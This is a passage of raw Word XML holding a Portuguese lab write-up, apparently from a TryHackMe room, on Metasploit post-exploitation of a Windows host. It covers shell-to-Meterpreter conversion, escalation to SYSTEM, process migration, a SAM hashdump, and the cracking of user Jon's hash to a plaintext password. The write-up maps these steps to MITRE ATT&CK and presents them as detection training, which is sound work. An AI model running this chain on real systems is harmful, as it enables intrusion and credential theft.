    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063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9 – Sessões ativas listadas no msfconsole (Session 1: shell x64/windows).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Ao inspecionar as opções do módulo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> antes de executar, a equipe confirmou os parâmetros obrigatórios necessários para que a conversão funcionasse de maneira controlada (ver Figura 7/8). No console, o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> evidenciou que o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já apontava para a sessão identificada (Session 1), que o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> do handler estava definido (4433) e que o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HANDLER</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> deveria estar ativo para receber a conexão de retorno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066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10 – Opções do módulo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post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (show options)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068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Ao executar o módulo de conversão com o handler ativo, o Metasploit iniciou o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse TCP handler</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, enviou o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e estabeleceu uma sessão Meterpreter (v.g. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter session 2 opened</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). Esse registro confirma que o shell reverso foi atualizado com sucesso para uma sessão Meterpreter, permitindo comandos de pós-exploração mais ricos. Em conformidade com as regras do laboratório, a sessão foi usada apenas para verificações não destrutivas e coleta de telemetria (getuid, sysinfo, getsystem), enquanto snapshots e logs foram preservados para análise forense.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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11 – Execução do módulo e abertura de sessão Meterpreter (session 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C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Após a abertura da sessão Meterpreter (Figura 11), a equipe interagiu com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Session 2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para obter um shell Windows interativo. Ao executar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sessions -i 2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shell (figura12)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, foi criado um processo na máquina alvo e disponibilizado um prompt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C:\Windows\system32&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Essa interação foi usada exclusivamente para verificações não destrutivas (ex.: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whoami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ipconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, listagem de diretórios) e para gerar telemetria correlacionável no SIEM/EDR; todos os passos foram registrados e snapshots foram preservados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D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12 – Interação com Session 2: shell remoto aberto (C:\Windows\system32&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F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verificação de contexto via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whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> confirmou que a sessão obtida possui privilégios </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figura 13). Isso indica que a etapa de elevação de privilégios foi bem-sucedida: o atacante em posse desse nível de privilégio tem capacidade para alterar serviços, extrair credenciais locais, manipular políticas e instalar mecanismos de persistência. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="240" w:before="24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13 – Saída do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whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostrando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NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (elevação para SYSTEM).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072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Após confirmar o contexto </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a equipe realizou a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">migração</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> da sessão Meterpreter para outro processo estável no host (PID 3036) com o objetivo de prevenir a perda da sessão caso o processo original termine e também para simular técnicas reais de estabilização de foothold usadas por atacantes. A operação foi executada via comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate 3036</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> no Meterpreter e completou-se com sucesso, conforme evidenciado pela mensagem de confirmação no console. Todos os passos foram registrados e os snapshots preservados para permitir análise forense.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073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14 – Migração de sessão Meterpreter para o processo PID 3036 (migration completed).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076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(ver Figura 14) A migração estabiliza a sessão e é uma técnica comum de pós-exploração; sua detecção requer correlação entre criação de processos, novas threads e conexões de rede provenientes do novo PID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077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15 – Saída do Meterpreter: migração concluída e dump de hashes do SAM (Administrator, Guest, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Após estabilizar a sessão (migração para um processo estável), a equipe executou uma coleta de credenciais no host alvo. A captura a seguir mostra a mensagem de migração bem-sucedida e a saída do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash dump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> que contém entradas do SAM (ex.: Administrator, Guest, Jom) com os respectivos hashes. No contexto do exercício controlado, essa ação teve por objetivo demonstrar a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exposição de credenciais locais</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e gerar evidências para testar detectores e playbooks de resposta — ciente de que, em ambiente produtivo, a detecção precoce e a rotação de credenciais são medidas críticas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A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Usuário não padrão : Jon  e senha </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B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16 – Quebra de hash NTLM e recuperação de credencial (usuário: Jon) via CrackStation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D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Ao analisar o conteúdo do SAM obtido, a equipe extraiu hashes NTLM representativos (ver Figura 15). Para demonstrar o risco associado, um hash foi submetido a um serviço de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash cracking</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CrackStation) em ambiente controlado, resultando na recuperação da credencial associada ao usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. A capacidade de transformar hashes offline em senhas em texto claro mostra como a exposição de hashes locais permite ataques </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pass-the-hash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, brute-force off-line e aumento rápido do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">blast radius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E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Figura 17 – Imagem do Sala do Try Hack Me</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080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Durante a fase de pós-exploração, a equipe utilizou a sessão Meterpreter para extrair hashes do SAM (hashdump) e testou a vulnerabilidade associada à exposição de credenciais. Um hash não-padrão referente ao usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> foi extraído e submetido a um serviço de cracking em ambiente controlado, resultando na recuperação da senha em texto claro: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">alqfna22</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta prova de conceito demonstra o risco imediato: hashes locais permitem ataques offline (brute-force / cracking) e ampliam muito o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">blast radius</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> se credenciais privilegiadas estiverem envolvidas. Todas as ações foram realizadas em laboratório com dados de teste; evidências e snapshots foram preservados para análise forense.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:widowControl w:val="0"/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(no lab: comando usado para dump de hashes —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hashdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — e a quebra do hash foi realizada com ferramenta online/local em ambiente controlado)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uufz43703w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Técnica, Laboratório e Adaptação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Técnicas MITRE ATT&amp;CK:</w:t>
        <w:br w:type="textWrapping"/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T1068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Exploitation for Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (explorar vulnerabilidades locais);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T1134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Access Token Manipulation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i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Token Impersonation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T1055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Process Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (quando relevante para técnicas de elevação).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Contexto real vs laboratório:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> No mundo real, um atacante usaria exploits locais, técnicas de impersonation de tokens, ou abuso de serviços/configurações com privilégios para subir para SYSTEM. Em laboratório, evitamos exploração de zero-days ou binários maliciosos — usamos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meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (upgrade do shell) e técnicas não destrutivas capazes de reproduzir a telemetria de interesse (tentativas de obter SYSTEM, execução de checks de configuração) para validar detecção.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widowControl w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4naogr30r0b8" w:id="12"/>
      <w:bookmarkEnd w:id="1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Passos Executados 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Conversão do shell para Meterpreter</w:t>
        <w:br w:type="textWrapping"/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Verificamos a existência do módulo de conversão e carregamos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post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. (ver Figura 7).</w:t>
        <w:br w:type="textWrapping"/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Confirmamos parâmetros obrigatórios (SESSION, LPORT, HANDLER) com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show options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. (ver Figura 8 / Figura 10).</w:t>
        <w:br w:type="textWrapping"/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Identificação da sessão ativa</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D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Listamos sessões com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show sessions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e identificamos Session 1 (shell x64/windows) como alvo do módulo de conversão. (ver Figura 9 / Figura 8).</w:t>
        <w:br w:type="textWrapping"/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Execução do módulo e estabelecimento de Meterpreter</w:t>
        <w:br w:type="textWrapping"/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 handler ativo e parâmetros verificados, executamos o módulo; o Metasploit iniciou o reverse TCP handler, enviou o stage e abriu uma sessão Meterpreter (ex.: Meterpreter session 2 opened). (ver Figura 11 / Figura 10).</w:t>
        <w:br w:type="textWrapping"/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Interação com a sessão Meterpreter</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091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Interagimos com a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Session 2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="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sessions -i 2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meterpreter&gt; shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) para obter um prompt Windows (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C:\Windows\system32&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). (ver Figura 12).</w:t>
        <w:br w:type="textWrapping"/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Verificação de contexto e elevação</w:t>
        <w:br w:type="textWrapping"/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Execução de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whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="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getuid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="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getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para verificar contexto;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whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> retornou NT AUTHORITY\SYSTEM, confirmando elevação de privilégio. (ver Figura 13).</w:t>
        <w:br w:type="textWrapping"/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Migração da sessão (estabilização do foothold)</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095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Realizamos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migrate &lt;PID&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para mover a sessão para um processo mais estável (ex.: PID 3036). Migração completada com sucesso. (ver Figura 14).</w:t>
        <w:br w:type="textWrapping"/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Coleta de credenciais (hashdump) e teste de cracking</w:t>
        <w:br w:type="textWrapping"/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Após estabilizar, executamos dump do SAM para obter hashes locais; hashes foram extraídos (Administrator, Guest, Jon, etc.). (ver Figura 15).</w:t>
        <w:br w:type="textWrapping"/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demonstrar o risco, um hash foi submetido a cracking em ambiente controlado (CrackStation) e a senha do usuário Jon foi recuperada como alqfna22. (ver Figura 16).</w:t>
        <w:br w:type="textWrapping"/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1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Documentamos todo o fluxo (comandos, logs, pcaps) e preservamos snapshots.</w:t>
        <w:br w:type="textWrapping"/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widowControl w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9bpawqip8lv" w:id="13"/>
      <w:bookmarkEnd w:id="1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Evidências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widowControl w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pz5racjczrzy" w:id="14"/>
      <w:bookmarkEnd w:id="1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Evidências (figuras e artefatos recomendados)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:widowControl w:val="0"/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Figuras (incluir as imagens onde indicado no texto):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2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7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Conversão de shell para Meterpreter: saída do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msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostrando o módulo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post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i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8</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Opções do módulo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post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HANDLER, LHOST, LPORT, SESSION).</w:t>
        <w:br w:type="textWrapping"/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9</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Sessões ativas listadas no msfconsole (Session 1: shell x64/windows).</w:t>
        <w:br w:type="textWrapping"/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10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Opções do módulo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post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="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show options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i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11</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Execução do módulo e abertura de sessão Meterpreter (session 2).</w:t>
        <w:br w:type="textWrapping"/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12</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Interação com Session 2: shell remoto aberto (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C:\Windows\system32&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i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13</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
